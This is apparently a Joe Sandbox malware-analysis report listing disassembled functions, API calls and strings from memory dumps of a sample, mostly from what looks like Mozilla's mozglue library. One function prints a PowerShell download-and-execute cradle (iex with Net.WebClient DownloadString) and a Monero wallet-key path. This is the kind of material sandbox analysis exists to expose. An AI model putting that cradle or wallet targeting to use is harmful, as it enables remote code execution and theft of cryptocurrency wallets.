Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 1c17428b0adaeb90d42264e911f96047c1e21bbda28c9a279d3945e4c52a7a0a
Instruction ID: 731b35dbccb453b5d3484cbab14251f34d1f082a47b3c2fb121ddb7f1c10b5a7
Opcode Fuzzy Hash: 1c17428b0adaeb90d42264e911f96047c1e21bbda28c9a279d3945e4c52a7a0a
Instruction Fuzzy Hash: 6CF08231905209EFE344DFE0E90972C7B70FB15703F08029AF60AC6690EA704B52DF96

Function 6C6CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6CB5F4
__Init_thread_footer.LIBCMT ref: 6C6CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6CB61F
std::_Facet_Register.LIBCPMT ref: 6C6CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB655

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction ID: 70af877dea57f0e7fc2c37128b4d8ba1b432833bcab7c8e056cdc96acfe85fe5
Opcode Fuzzy Hash: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction Fuzzy Hash: FB316F71B002058BCB00DFAAC8989AEB7F5EFCA325F150519D90697780DB31B906CF9E

Function 6C68D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C65EB57,?,?,?,?,?,?,?,?,?), ref: 6C68D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C65EB57,?), ref: 6C68D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C65EB57,?), ref: 6C68D673
free.MOZGLUE(?), ref: 6C68D888

Strings

Wel, xrefs: 6C68D5D9, 6C68D63F
|Enabled, xrefs: 6C68D81E

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wel$|Enabled
API String ID: 4142949111-1036103015
Opcode ID: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction ID: 73895f8debc637035f6ab12ae7658e5f5767ac23accadb84eb3d4b2661b4f139
Opcode Fuzzy Hash: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction Fuzzy Hash: 14A1F2B0A012499FDF10CF69C4907EEBBF1AF4A318F58805ED885AB741C734A845CBB9

Function 6C6A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6A1DDA

Part of subcall function 6C6A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6A1F03
Part of subcall function 6C6A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6A1DF2,00000000,00000000), ref: 6C6A1F0C
Part of subcall function 6C6A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6A1DF4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction ID: 6237317cd5e8c4c48d03eaf6022813b837f2a5122011ce4a3e1288e701c1984f
Opcode Fuzzy Hash: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction Fuzzy Hash: 434167B52007019FCB10DF69C488A56BBF9FF89314F10442EE95A87B41DB31F855CB99

Function 6C6984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985AC

Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69767F
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C697693
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985B2

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction ID: b02f8cc00a9fe643691ff8c2603e189c6edef795f28809ea080049c642b51048
Opcode Fuzzy Hash: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction Fuzzy Hash: 7D218E742006029FDB14DF29C888A5AB7B5AF8930CF24492DE55BC3B51EB31F949CB59

Function 6C69F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F561

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F585
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C69F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C69F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C69F499
[I %d/%d] profiler_resume, xrefs: 6C69F239

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction ID: c3c579bf121b4f29216cc944803579b568ea5ae6b2b9047ff900d25c0825af38
Opcode Fuzzy Hash: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction Fuzzy Hash: 82F0B4752002059FDB006F669C8895E77BDEFCA29EF010415FA0583706CF31A801876E

Function 6C6905F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C68CFAE,?,?,?,6C6531A7), ref: 6C6905FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C68CFAE,?,?,?,6C6531A7), ref: 6C690616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6531A7), ref: 6C69061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6531A7), ref: 6C690627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C69061B, 6C690625
<jemalloc>, xrefs: 6C6905FA, 6C69060F

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction ID: 48e1536f2f0669c544160619b682af56469d35fc0a8b4f871b052f5e726b8a34
Opcode Fuzzy Hash: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction Fuzzy Hash: 69E08CE2A0101037F6142256BC86DBB761CDBC6134F080039FE0E83341E94ABD1A51FB

Function 6C6605F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction ID: 5d20436572da2bca74fa40327ce16ae1097bfe10773e91a6ef8623a71e3834a3
Opcode Fuzzy Hash: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction Fuzzy Hash: 8AA15AB0A016458FDB24CF2AC594A99FBF1BF49304F44866ED44A97B00E731BA85CF99

Function 6C6B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6B14E2
GetCurrentThreadId.KERNEL32 ref: 6C6B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6B15BA
free.MOZGLUE(?), ref: 6C6B16B4

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction ID: aba4de780e88ec0fbd8ae92ed5aa9381c591fd8fdf4d159ca99d83c8d4769e11
Opcode Fuzzy Hash: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction Fuzzy Hash: 2361F572A007009BDB118F25C880BDEB7B5BF8A308F04851DED8A67711EB31E955CB99

Function 6C6ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6AD38A,?), ref: 6C6ADC6F
free.MOZGLUE(?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6AD38A,?), ref: 6C6ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6AD38A,?), ref: 6C6ADD4A

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction ID: bcadd9162a49f29ceb0e17f71bb7541758fe66ea6d43d186fbb7bff36c009d76
Opcode Fuzzy Hash: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction Fuzzy Hash: 24416BB5A00605DFCB00CF99C88099AB7F5FF89314B654569DE46ABB11D771FC02CB98

Function 6C68F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C68F480

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

CloseHandle.KERNEL32(00000000), ref: 6C68F555

Part of subcall function 6C6614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C661248,6C661248,?), ref: 6C6614C9
Part of subcall function 6C6614B0: memcpy.VCRUNTIME140(?,6C661248,00000000,?,6C661248,?), ref: 6C6614EF

Part of subcall function 6C65EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C65EEE3

CreateFileW.KERNEL32 ref: 6C68F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C68F523

Strings

\oleacc.dll, xrefs: 6C68F4CB

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction ID: 0d1bc788e9566150df40bd87b32a434fe4a46e126bf0021ca286a0276173a7db
Opcode Fuzzy Hash: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction Fuzzy Hash: 4541BF706097109FE720DF29D884A9BB7F4AF95318F504A1CF59083690EB70E949CBAB

Function 008A2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

ShellExecuteEx.SHELL32(0000003C), ref: 008A2D85

Strings

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008A2D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008A2CC4
')", xrefs: 008A2CB3
<, xrefs: 008A2D39

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: e48377f2e5644837623a393cf5b4dbea614bdef282e6b6276299e0064d7d7826
Instruction ID: 3ee8b9c1af15917f13475199909b3e8d84d516505126c99f791836505315c3c1
Opcode Fuzzy Hash: e48377f2e5644837623a393cf5b4dbea614bdef282e6b6276299e0064d7d7826
Instruction Fuzzy Hash: E641DF71D102089AEB58EFA4C891BEEBB74FF11300F404129F016E7991DF786A4ACF92

Function 6C6B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6B7526
__Init_thread_footer.LIBCMT ref: 6C6B7566
__Init_thread_footer.LIBCMT ref: 6C6B7597

Strings

kernel32.dll, xrefs: 6C6B7557
UnmapViewOfFile2, xrefs: 6C6B7552

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction ID: 70c3812f21271e644d1c9f7080f2d601ef814584af8e9d41c780a69cb21825ee
Opcode Fuzzy Hash: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction Fuzzy Hash: 1621373270150197CB248FEAD894ED973B5EB87725F054529E80167B80DB31B9118BBF

Function 6C6BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6BC0E9), ref: 6C6BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6BC437
FreeLibrary.KERNEL32(?,6C6BC0E9), ref: 6C6BC44C

Strings

NtQueryVirtualMemory, xrefs: 6C6BC431
ntdll.dll, xrefs: 6C6BC413

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
